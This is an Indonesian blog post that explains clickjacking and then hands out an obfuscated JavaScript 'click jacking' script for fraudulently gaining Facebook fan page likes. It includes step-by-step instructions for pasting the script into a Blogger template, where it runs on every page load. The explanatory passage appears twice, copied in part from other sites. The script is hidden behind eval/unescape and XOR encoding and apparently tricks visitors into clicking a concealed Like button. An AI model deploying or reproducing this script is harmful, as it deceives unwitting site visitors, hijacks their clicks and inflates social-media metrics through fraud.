Script click jacking untuk memperbanyak like fanspage
Clickjacking adalah teknik menipu pengguna sembarangan Web mengungkapkan informasi rahasia atau mengambil alih komputer mereka sementara mengklik pada halaman Web yang tampaknya tidak berbahaya. Sebuah kerentanan di berbagai browser dan platform, sebuah clickjacking mengambil bentuk kode tertanam atau script yang dapat mengeksekusi tanpa sepengetahuan pengguna, seperti mengklik pada tombol yang muncul untuk melakukan fungsi lain.
Sebuah trik halaman clickjacked pengguna ke dalam melakukan tindakan yang tidak diinginkan dengan mengklik link tersembunyi. Pada halaman clickjacked, para penyerang menunjukkan serangkaian tombol dummy, lalu load halaman lain di dalam lapisan transparan. Para pengguna berpikir bahwa mereka adalah mengklik tombol terlihat, sedangkan mereka benar-benar melakukan tindakan pada halaman tersembunyi. Halaman tersembunyi mungkin menjadi halaman otentik, dan oleh karena itu penyerang bisa mengelabui pengguna melakukan tindakan yang pengguna tidak pernah dimaksudkan untuk dilakukan dan tidak ada cara untuk melacak tindakan seperti kemudian, ketika pengguna benar-benar dikonfirmasi pada halaman lain.
(Deskripsi , src : kaskus )
Dari pengamatan gue di halaman Facebook, paling tidak ada dua orang teman yang terus-menerus update status dengan kata-kata di atas. Sebagai pengguna Facebook semestinyalah waspada karena sebagian besar virus/spam yang menyerang akun FB disebarkan melalui link. Link-link yang tidak jelas tersebut walaupun di-share oleh teman merupakan spam yang bisa merusak akun FB pengguna. Walaupun yang men-share link itu teman, jangan mudah percaya karena bisa saja teman yang men-share link tersebut sudah terkena sebelumnya. Biasanya kalau sudah mengklik link berupa spam dengan otomatis pengguna yang mengklik link itu akan men-share link yang sama kepada semua teman yang ada dalam daftarnya sehingga bila semua teman tersebut juga mengklik akan makin banyaklah spam yang menyebar.
Sampai saat ini, belum jelas benar link yang diklik itu apakah video atau hanya halaman kosong. Menurut mashable.com/ link yang di-share tersebut adalah semacam spam yang nantinya akan memposting dirinya sendiri di status pengguna Facebook yang telah mengklik link itu sebelumnya. Sebagai spam tentu saja tanpa ada perintah apa pun akan memenuhi halaman Facebook pengguna, apalagi jika teman yang lain juga mengklik link yang di-share tersebut. Seperti saya uraikan sebelumnya, di dalam daftar teman saya di FB paling tidak sudah ada
dua orang yang terus-menerus mengupdate statusnya dengan kata-kata di atas dan persis sama yang intinya menyuruh teman untuk ikut mengklik link itu juga.
Kalau menurut saya sendiri ClickJacking adalah metode blackhat yang sering digunakan untuk menipu user / visitor yang sedang melihat suatu content di sebuah blog atau website jadi misalnya sobat masuk ke blog perampokgoogle tanpa sobat sadari dengan mengklik atau mengarahkan kursor kemanapun terus menekan / mengklik content dengan sendirinya sobat telah megklik konten yang disembunyikan diblog tersebut, Kalau di AdSense banyak juga yang pakai metode ini hanya saja ditambah dengan script auto refresh cookie, page, etc dengan jangka waktu yang sudah diatur dan iklan dengan sendirinya menghilang jika sobat sudah terdeteksi diawal pertama masuk ke blog tersebut.
Kapan kapan akan saya bagikan deh script tersebut mungkin berguna buat pembelajaran sobat rampok disini, Saran dari saya jangan dipakai diblog yang sudah ada script iklan AdSense kalau visitor sobat belum mencapai 10k / hari.
Oke langsung aja ya saya bagikan script click jacking untuk fanspage facebook..
Cara memasangnya di template blogger :
Script click jacking untuk memperbanyak like fanspage
Deskripsi
Clickjacking ini dimungkinkan karena fitur yang tampaknya tidak berbahaya dari HTML halaman Web dapat digunakan untuk melakukan tindakan tak terduga.Sebuah trik halaman clickjacked pengguna ke dalam melakukan tindakan yang tidak diinginkan dengan mengklik link tersembunyi. Pada halaman clickjacked, para penyerang menunjukkan serangkaian tombol dummy, lalu load halaman lain di dalam lapisan transparan. Para pengguna berpikir bahwa mereka adalah mengklik tombol terlihat, sedangkan mereka benar-benar melakukan tindakan pada halaman tersembunyi. Halaman tersembunyi mungkin menjadi halaman otentik, dan oleh karena itu penyerang bisa mengelabui pengguna melakukan tindakan yang pengguna tidak pernah dimaksudkan untuk dilakukan dan tidak ada cara untuk melacak tindakan seperti kemudian, ketika pengguna benar-benar dikonfirmasi pada halaman lain.
(Deskripsi , src : kaskus )
Dari pengamatan gue di halaman Facebook, paling tidak ada dua orang teman yang terus-menerus update status dengan kata-kata di atas. Sebagai pengguna Facebook semestinyalah waspada karena sebagian besar virus/spam yang menyerang akun FB disebarkan melalui link. Link-link yang tidak jelas tersebut walaupun di-share oleh teman merupakan spam yang bisa merusak akun FB pengguna. Walaupun yang men-share link itu teman, jangan mudah percaya karena bisa saja teman yang men-share link tersebut sudah terkena sebelumnya. Biasanya kalau sudah mengklik link berupa spam dengan otomatis pengguna yang mengklik link itu akan men-share link yang sama kepada semua teman yang ada dalam daftarnya sehingga bila semua teman tersebut juga mengklik akan makin banyaklah spam yang menyebar.
Sampai saat ini, belum jelas benar link yang diklik itu apakah video atau hanya halaman kosong. Menurut mashable.com/ link yang di-share tersebut adalah semacam spam yang nantinya akan memposting dirinya sendiri di status pengguna Facebook yang telah mengklik link itu sebelumnya. Sebagai spam tentu saja tanpa ada perintah apa pun akan memenuhi halaman Facebook pengguna, apalagi jika teman yang lain juga mengklik link yang di-share tersebut. Seperti saya uraikan sebelumnya, di dalam daftar teman saya di FB paling tidak sudah ada
dua orang yang terus-menerus mengupdate statusnya dengan kata-kata di atas dan persis sama yang intinya menyuruh teman untuk ikut mengklik link itu juga.
Kalau menurut saya sendiri ClickJacking adalah metode blackhat yang sering digunakan untuk menipu user / visitor yang sedang melihat suatu content di sebuah blog atau website jadi misalnya sobat masuk ke blog perampokgoogle tanpa sobat sadari dengan mengklik atau mengarahkan kursor kemanapun terus menekan / mengklik content dengan sendirinya sobat telah megklik konten yang disembunyikan diblog tersebut, Kalau di AdSense banyak juga yang pakai metode ini hanya saja ditambah dengan script auto refresh cookie, page, etc dengan jangka waktu yang sudah diatur dan iklan dengan sendirinya menghilang jika sobat sudah terdeteksi diawal pertama masuk ke blog tersebut.
Kapan kapan akan saya bagikan deh script tersebut mungkin berguna buat pembelajaran sobat rampok disini, Saran dari saya jangan dipakai diblog yang sudah ada script iklan AdSense kalau visitor sobat belum mencapai 10k / hari.
Oke langsung aja ya saya bagikan script click jacking untuk fanspage facebook..
Cara memasangnya di template blogger :
- Masuk ke blogger blogger.com/home
- Pilih menu Template
- Kemudian Edit HTML
- Search / Cari / Tekan CTRL + F kode HTML '</body>
- Setelah ketemu silahkan pastekan kode dibawah ini tepat diatas kode tadi.
<script type='text/javascript'>
<!--
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%74%38%39%66%33%32%61%38%33%66%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%37%33%38%34%34%31%38%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%36%35%34%35%31%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%35%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%74%38%39%66%33%32%61%38%33%66%28%27') + '%32%66%5a%69%61%6f%6a%1c%69%71%6f%65%39%18%67%64%77%6a%2e%60%5b%77%59%6a%5b%6c%61%63%6b%19%3c%0c%2d%2c%32%18%53%3f%3a%34%4b%38%53%0c%2d%2c%1e%45%59%5f%65%55%6e%6e%63%0c%76%5a%68%1f%64%5d%6c%52%6f%58%67%64%5f%77%6b%62%3c%18%62%6a%67%6f%6a%30%2e%2f%75%74%77%2d%64%5d%5b%68%59%6e%6f%62%2c%59%6c%6d%2e%6e%61%68%54%6c%6f%6f%62%67%6d%6c%67%63%65%1c%22%62%6f%58%5b%60%6a%73%3e%2c%2f%29%26%6a%6c%6c%64%3d%28%35%67%28%33%27%5a%6b%5b%78%6c%64%6c%6b%2c%65%66%6a%44%62%61%6d%68%6d%6b%38%70%41%58%27%24%76%61%68%5a%62%76%2d%59%5b%5a%47%77%65%6d%6a%46%61%66%6b%64%6c%64%68%70%71%77%60%6c%5e%6f%7a%2d%58%6a%6b%59%59%65%45%75%65%68%6a%2c%25%25%19%65%75%6e%58%6a%60%6f%68%26%2c%72%65%75%6d%5b%68%62%6f%6d%1e%61%26%68%20%72%74%58%68%1c%69%22%6d%33%6c%65%67%74%69%6c%1f%66%3d%25%6a%3c%5a%28%6e%54%66%64%51%4e%64%66%68%65%6b%22%68%3d%57%2d%6f%59%66%65%54%4c%64%65%6b%61%6a%2c%31%27%6a%3c%5a%2e%68%5b%69%6f%66%62%47%6e%6f%22%6d%3d%58%2f%6b%5a%68%6b%62%6f%43%64%64%6b%21%20%2d%3d%3c%65%3b%6a%3d%6d%7c%64%74%6c%59%69%61%6e%6c%1a%6a%2b%6b%20%73%75%59%6a%1d%6c%3c%66%3b%77%6c%6d%5b%6f%76%2c%6c%5a%67%64%51%4b%64%69%6a%64%6a%31%2e%31%69%72%73%26%6e%3d%7a%60%6d%5a%6e%77%2e%66%74%64%6c%6e%21%2f%19%6d%75%6c%58%67%6b%18%3c%3d%6e%71%63%64%6e%64%1f%6a%2e%6d%59%66%65%55%3f%2b%69%3c%6a%2d%6e%5b%64%65%50%2d%2d%35%20%6d%23%62%3c%6a%2e%6d%59%66%65%52%2d%26%2b%20%30%27%68%3f%69%2c%5a%62%65%65%61%6b%50%2d%28%34%2f%6f%22%63%3d%6e%2c%56%63%60%65%6d%6a%54%2e%2b%35%21%26%75%21%6b%6e%6e%3c%68%21%66%26%2f%21%27%6b%2f%74%2d%62%64%64%68%3e%62%22%6b%79%64%78%6d%5a%6a%60%6f%6e%1d%6c%27%21%77%75%21%6b%6e%6e%3c%68%21%66%26%2f%21%27%6b%2f%6a%64%6a%4b%61%6f%66%6f%74%6a%22%6c%2f%2a%2f%2e%20%7d%66%76%6c%5a%6a%65%6f%61%1f%6e%26%20%73%77%3e%5a%6e%5b%71%6d%68%6d%6b%2c%66%65%68%46%62%64%6d%61%6c%67%39%70%41%5b%26%1a%69%66%64%61%60%68%54%6c%64%18%20%2c%69%69%71%63%65%26%6c%2b%20%7c%64%74%6c%59%69%61%6e%6c%1a%61%2b%64%20%73%75%59%6a%1d%6a%3c%5a%6b%5b%78%6c%64%6c%6b%2c%59%6c%6f%62%61%61%22%61%3c%6b%2c%60%6c%58%66%76%4e%64%22%18%13%19%22%65%22%18%3f%1b%21%32%61%60%26%20%28%3c%3d%6d%24%26%25%6c%3c%6a%28%61%61%5b%64%76%4e%64%24%66%23%19%3d%1c%21%2c%23%2c%29%3c%3d%6e%22%6a%3c%6c%71%62%6f%32%64%62%6a%65%71%6f%3d%6b%2c%65%6c%57%64%77%4f%65%26%1a%3e%18%23%6c%25%23%24%32%75%59%69%1e%6d%3e%6a%2d%61%68%5a%68%77%4e%64%27%18%31%1b%22%6d%21%37%2d%24%3c%3c%6f%25%24%24%6c%3d%6b%2c%66%65%61%66%6b%66%20%22%68%3e%75%6d%65%6f%5b%54%6f%64%26%6b%2c%69%76%58%6a%6a%6c%61%61%66%27%6c%23%6f%23%22%7d%69%65%6e%75%65%6d%1f%6a%7c%64%77%6f%5b%6b%61%6b%6c%13%58%27%65%23%6a%20%6f%21%72%74%5d%68%13%6e%3c%6c%64%77%1c%39%59%6b%65%37%6f%21%6a%64%6a%3b%59%68%66%26%6e%2c%63%65%67%3b%58%6a%64%26%23%20%6c%20%33%70%59%65%1f%60%3d%64%6b%59%5a%6e%64%26%6e%21%2e%27%6d%75%63%62%3f%3e%6c%3e%18%1c%30%15%32%1f%65%77%6e%63%6b%65%6a%3d%1c%23%62%2d%6b%6f%54%4a%39%48%6a%69%61%68%67%2b%20%20%33%5b%6f%59%76%6d%64%6c%6e%2c%56%6e%6e%63%60%65%3f%66%23%19%3d%1c%23%6c%7c%75%59%69%1e%58%21%6d%23%5b%39%5a%62%5a%74%6d%64%6c%68%21%68%3c%2d%2d%2e%2f%63%3c%2d%28%2e%20%76%3d%19%18%26%6e%30%27%5b%6f%5a%75%6f%66%6c%6b%2c%63%65%67%44%63%65%6c%65%6e%69%6b%39%71%4e%59%6a%4d%58%6d%64%26%1a%59%61%75%18%25%2c%6f%64%6d%67%6b%66%20%1b%32%60%64%6c%59%60%64%1f%61%5b%3d%25%69%66%64%61%60%68%54%6c%64%27%1f%6b%59%6b%6f%63%62%65%6c%6a%3c%26%6c%6e%27%1c%67%68%58%6d%61%38%62%69%5b%65%69%3d%25%2d%27%1f%59%66%62%62%76%4b%68%58%6c%69%6d%59%69%65%68%5b%7c%3c%26%6a%69%75%67%24%1e%6a%68%5f%3d%2a%67%6b%6a%6f%30%2d%2c%77%76%77%28%64%54%5a%64%58%6e%6f%61%2f%5b%6e%6d%2b%77%6c%5b%66%65%6b%6b%2d%61%61%62%65%28%6e%6b%6f%3e%66%69%65%66%3e%18%22%65%68%5b%62%5b%64%55%49%41%39%6c%6d%6f%6f%68%65%61%6b%27%64%58%6c%5d%6d%59%66%65%5b%75%65%63%20%23%19%24%5b%6e%6e%32%62%5d%71%62%74%6b%3d%6a%6a%5b%6f%5a%58%68%5e%24%54%6c%6f%33%6a%66%6d%74%5f%65%59%5f%65%66%3c%6b%68%74%65%26%5a%6d%6f%33%73%61%57%6b%67%3d%37%2e%26%5a%6d%6f%33%5d%5b%67%60%6e%6c%3c%62%63%60%65%25%59%69%6e%3e%5a%6e%62%6e%68%69%58%66%64%6d%61%3d%6f%60%66%66%6b%24%5b%6e%6e%32%66%61%61%6a%67%6b%3d%2a%2e%25%1d%6b%6b%71%66%65%30%26%6f%6f%6a%61%68%62%6f%6d%30%5d%58%66%6e%63%75%6b%65%31%74%61%5b%6a%62%30%38%2a%6f%76%32%66%67%62%67%67%6a%34%2b%23%6f%77%33%71%2d%63%6f%5a%64%76%34%1e%25%2f%2f%2e%2f%2e%31%6c%74%64%68%60%62%62%76%31%66%60%5a%58%66%6c%32%58%6b%68%57%64%69%30%2f%33%6d%6d%59%5a%61%6e%71%3d%19%22%6f%6f%59%59%62%6a%70%23%1c%33%69%60%63%6a%64%68%32%5a%62%6f%66%5d%26%62%6f%58%5b%60%6a%73%3e%18%22%29%2a%2e%2d%6e%6f%59%5a%61%68%72%23%19%21%37%27%31%33%2e%61%65%68%5b%6e%65%3d%18%25%22%69%3c%60%26%19%64%5b%58%65%43%61%67%65%15%20%32%6c%74%62%60%1a%3d%65%24%20%18%15%18%3c%64%73%72%24%5a%26%19%64%5d%5b%68%43%60%63%64%18%20%1b%62%60%63%61%5a%15%23%28%21%23%5a%6d%58%75%6c%65%68%6a%21%76%69%61%6b%65%24%6d%21%23%6d%39%5a%62%5a%74%6d%64%6c%68%2f%67%64%6a%41%62%68%6c%64%6c%6b%38%73%42%5a%27%18%6e%66%68%60%65%68%58%6d%67%1b%21%23%5a%6b%5b%78%6c%64%6c%6b%2c%65%66%6a%44%62%61%6d%68%6d%6b%6b%39%71%48%5a%67%4d%59%69%65%2b%19%59%6f%5b%71%1a%22%53%2f%5d%28%59%63%6f%64%6c%5b%3b%64%62%62%5b%26%69%21%2c%32%75%59%69%1e%69%3e%18%6f%76%1c%22%7a%3c%19%6c%74%6d%5a%66%68%19%3d%39%6a%7c%6f%64%6f%65%1e%75%62%6c%5b%6f%73%2c%6c%6d%6d%65%69%57%63%59%6a%67%22%62%3d%15%6d%74%6d%59%65%6a%1b%3d%3c%6a%75%6e%68%6e%65%1e%76%61%6e%59%6f%76%2c%6a%59%6a%64%50%4f%65%64%69%66%6a%32%77%3b%5a%30%76%60%6c%5b%6f%75%33%5b%2d%5a%6b%5b%78%6c%64%6c%6b%45%60%66%6d%64%6c%6e%24%29%19%6d%75%6c%58%67%6b%18%3c%3d%6e%71%63%64%6e%64%1f%5b%2e%59%6f%5a%75%69%65%61%6b%44%62%64%6d%67%6f%6a%2d%5b%66%61%68%6d%6b%57%60%5a%68%65%24%25%2e%1d%3d%56%2d%5b%6f%5a%75%6f%66%6c%6b%45%66%65%60%64%6d%6a%2d%5b%60%62%65%6d%6a%53%61%57%6b%67%3f%5b%3d%59%2f%5a%6e%5b%71%6d%68%6d%6b%45%63%65%6f%66%6c%6b%30%5f%2c%55%6e%5b%71%25%24%1a%6f%75%6c%58%61%68%15%3c%3c%6a%70%6e%67%6c%64%1f%5b%28%58%62%5b%70%2c%5a%62%63%66%6c%6b%57%65%5a%67%67%25%24%27%5a%3f%58%2c%59%6f%5e%71%2c%23%2f%19%3c%6a%63%6e%65%25%24%6f%65%67%4b%60%6d%64%6f%77%69%26%65%75%68%5b%67%60%6e%6c%27%21%71%59%6f%5a%75%69%65%61%6b%2d%67%64%6a%47%61%65%6c%65%68%6a%66%39%70%4a%58%67%4e%5a%6d%64%26%1c%58%62%5b%70%18%20%53%2c%5e%2c%69%65%69%6f%79%64%3a%66%60%62%58%25%6d%20%22%73%61%61%5b%6e%77%2d%59%58%59%45%75%65%68%6a%4f%60%6a%6a%64%6c%67%6b%3f%5b%6f%5f%75%60%64%6d%6a%2d%68%67%6e%6f%75%65%41%74%68%6d%6b%42%60%6b%68%66%6c%64%68%22%18%60%6e%74%6b%64%6d%6d%77%65%19%22%6e%22%14%28%20%30%76%61%6e%59%6f%76%2c%5d%6a%67%58%5a%66%44%74%67%6f%6a%25%24%5e%6f%56%74%6c%65%6d%6a%2e%59%65%6b%59%5f%66%48%75%64%6c%6b%26%1a%6c%6c%6c%6f%71%6b%68%6c%6e%74%64%18%20%69%21%7c%22%6e%61%60%64%20%22%76%61%6e%59%6f%76%2c%5d%5a%57%44%75%65%6d%6a%40%62%6b%6b%65%68%65%65%3e%27%77%60%6c%58%6c%77%2d%59%5e%5a%48%75%64%6c%6b%42%63%68%6a%64%6c%61%68%2b%19%63%6f%58%5a%1a%21%6f%23%19%2d%21%2f%5b%6e%5b%74%6d%67%6f%6a%2d%59%5e%5a%48%75%64%6c%6b%42%63%68%6a%64%6c%61%68%2b%19%6c%6f%74%6b%67%6e%6f%75%65%1c%22%67%23%18%29%20%21%32%74%61%6d%5a%6b%77%21%58%6b%6a%58%5b%64%46%74%64%6c%6e%24%29%27%76%61%6d%5a%6d%74%2c%58%6a%6e%59%56%67%44%74%64%6c%68%25%18%6e%6c%66%6f%54%5b%19%22%6e%21%20%59%6f%5a%75%69%65%61%6b%2d%59%6b%6a%5b%58%66%44%74%61%6c%67%27%19%6f%6d%6d%6d%76%6b%64%6d%6b%74%68%19%23%6a%20%21%7f%25%21%32%0d%04%2f%22%5c%5c%3c%0c%30%2c%6b%5a%68%65%6e%67%3d17384418%35%38%34%34%35%34%35' + unescape('%27%29%29%3b'));
// -->
</script>
Simpan
Done
